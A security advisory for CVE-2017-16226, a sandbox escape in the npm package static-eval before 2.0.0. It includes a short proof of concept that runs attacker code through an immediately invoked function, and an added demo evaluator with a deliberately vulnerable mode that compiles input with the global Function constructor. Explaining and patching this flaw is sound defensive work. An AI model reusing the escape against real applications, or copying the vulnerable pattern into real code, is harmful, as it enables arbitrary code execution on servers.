CVE-2017-16226
Sandbox Breakout / Arbitrary Code Execution in static-eval
EPSS 1.3%
Description
Affected versions of `static-eval` pass untrusted user input directly to the global function constructor, resulting in arbitrary code execution when an expression derived from user input is evaluated with the package. The `vars` object passed to `evaluate` does not isolate the code: the compiled function runs with the real global scope of the process.

## Proof of concept

```js
var evaluate = require('static-eval');
var parse = require('esprima').parse;

// Attacker-controlled expression: a function expression that is immediately invoked.
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;

// Vulnerable static-eval (< 2.0.0) compiles the function body with Function(),
// so it executes even though no variables are supplied.
var res = evaluate(ast, {}); // Will print the process id
```

## Recommendation

Update to version 2.0.0 or later.
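To make the bug class concrete without installing the vulnerable package, here is an added example (not static-eval's own source) of a minimal ESTree-style evaluator in the style the advisory describes. Its vulnerable mode re-serialises a `FunctionExpression` and hands it to the global `Function` constructor; its hardened mode refuses function bodies outright. The names `makeEvaluator`, `vulnerableEvaluate`, `hardenedEvaluate` and `unparse` are illustrative (`unparse` stands in for escodegen), the ASTs are constructed by hand in the shape esprima would produce, and the hardened mode is a conservative choice for this example, not a description of how 2.0.0 itself fixed the issue.

```javascript
'use strict';
// Added example, not static-eval's code. Runs offline: no esprima, no static-eval.

const FAIL = Symbol('FAIL'); // sentinel: "cannot evaluate statically"

// Minimal stand-in for escodegen: turns the supported node types back into
// source text. This step is what makes the vulnerable path possible.
function unparse(node) {
  switch (node.type) {
    case 'Literal':          return JSON.stringify(node.value);
    case 'Identifier':       return node.name;
    case 'MemberExpression': return unparse(node.object) + '.' + node.property.name;
    case 'BinaryExpression': return '(' + unparse(node.left) + ' ' + node.operator + ' ' + unparse(node.right) + ')';
    case 'CallExpression':   return unparse(node.callee) + '(' + node.arguments.map(unparse).join(', ') + ')';
    case 'ReturnStatement':  return 'return ' + unparse(node.argument) + ';';
    case 'BlockStatement':   return '{ ' + node.body.map(unparse).join(' ') + ' }';
    case 'FunctionExpression':
      return '(function (' + node.params.map(unparse).join(', ') + ') ' + unparse(node.body) + ')';
    default: throw new Error('unparse: unsupported node ' + node.type);
  }
}

function makeEvaluator(allowFunctionBodies) {
  function walk(node, vars) {
    switch (node.type) {
      case 'Literal':
        return node.value;
      case 'Identifier':
        // Only names the caller supplied in `vars` resolve; process, require,
        // globalThis and friends are a FAIL, never a global lookup.
        return Object.prototype.hasOwnProperty.call(vars, node.name) ? vars[node.name] : FAIL;
      case 'BinaryExpression': {
        const l = walk(node.left, vars); if (l === FAIL) return FAIL;
        const r = walk(node.right, vars); if (r === FAIL) return FAIL;
        if (node.operator === '+') return l + r;
        if (node.operator === '-') return l - r;
        return FAIL;
      }
      case 'MemberExpression': {
        if (node.computed) return FAIL;
        const obj = walk(node.object, vars); if (obj === FAIL) return FAIL;
        if (obj === null || (typeof obj !== 'object' && typeof obj !== 'function')) return FAIL;
        // Own properties only, so x.constructor.constructor cannot climb to Function.
        return Object.prototype.hasOwnProperty.call(obj, node.property.name) ? obj[node.property.name] : FAIL;
      }
      case 'CallExpression': {
        const callee = walk(node.callee, vars);
        if (typeof callee !== 'function') return FAIL;
        const args = [];
        for (const a of node.arguments) { const v = walk(a, vars); if (v === FAIL) return FAIL; args.push(v); }
        return callee.apply(null, args);
      }
      case 'FunctionExpression': {
        if (!allowFunctionBodies) return FAIL; // hardened: never compile a body
        // VULNERABLE (the CVE-2017-16226 pattern): the attacker-controlled node is
        // turned back into source and compiled with the global Function constructor.
        // The closure it returns sees the real global scope, so an empty `vars`
        // gives no isolation at all.
        const keys = Object.keys(vars);
        const vals = keys.map((k) => vars[k]);
        return Function(keys.join(', '), 'return ' + unparse(node)).apply(null, vals);
      }
      default:
        return FAIL; // unknown syntax fails closed
    }
  }
  return (node, vars) => { const v = walk(node, vars || {}); return v === FAIL ? undefined : v; };
}

const vulnerableEvaluate = makeEvaluator(true);
const hardenedEvaluate = makeEvaluator(false);

// Constructed AST for `(function () { return process.pid; })()`: the advisory's
// proof of concept with console.log replaced by a return so the result is checkable.
const escapeAst = {
  type: 'CallExpression', arguments: [],
  callee: {
    type: 'FunctionExpression', params: [],
    body: { type: 'BlockStatement', body: [{
      type: 'ReturnStatement',
      argument: { type: 'MemberExpression', computed: false,
                  object: { type: 'Identifier', name: 'process' },
                  property: { type: 'Identifier', name: 'pid' } },
    }] },
  },
};

// Constructed AST for the benign expression `x + 1`.
const benignAst = {
  type: 'BinaryExpression', operator: '+',
  left: { type: 'Identifier', name: 'x' },
  right: { type: 'Literal', value: 1 },
};

console.log('benign, both modes:', vulnerableEvaluate(benignAst, { x: 2 }), hardenedEvaluate(benignAst, { x: 2 }));
console.log('escape ran in vulnerable mode:', vulnerableEvaluate(escapeAst, {}) === process.pid);
console.log('escape in hardened mode:', hardenedEvaluate(escapeAst, {}));
```

The benign expression evaluates to 3 in both modes, which is the point: a "static" evaluator needs no `Function` or `eval` call at all, and the single node type that delegates to the engine is the entire sandbox. The general rule this illustrates is that any path in an expression sandbox that reconstructs source text and hands it to `Function`, `eval`, `vm.runInThisContext` or similar is a code-execution primitive regardless of how restricted the surrounding walker is.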
How to fix CVE-2017-16226
To remediate CVE-2017-16226, upgrade the affected package to a fixed version below.
- static-eval: upgrade to 2.0.0 or later
Is CVE-2017-16226 being exploited?
Low. EPSS (the Exploit Prediction Scoring System) estimates a 1.3% probability that this CVE is exploited in the wild within the next 30 days. That figure is a model prediction, not an observation that exploitation has or has not occurred, and it says nothing about a specific deployment: any application that evaluates attacker-controlled expressions with a vulnerable static-eval is exploitable with the one-line proof of concept above, so the score should not be read as a reason to defer the upgrade.
Affected packages (1)
- static-eval: every version below 2.0.0 (>= 0, < 2.0.0)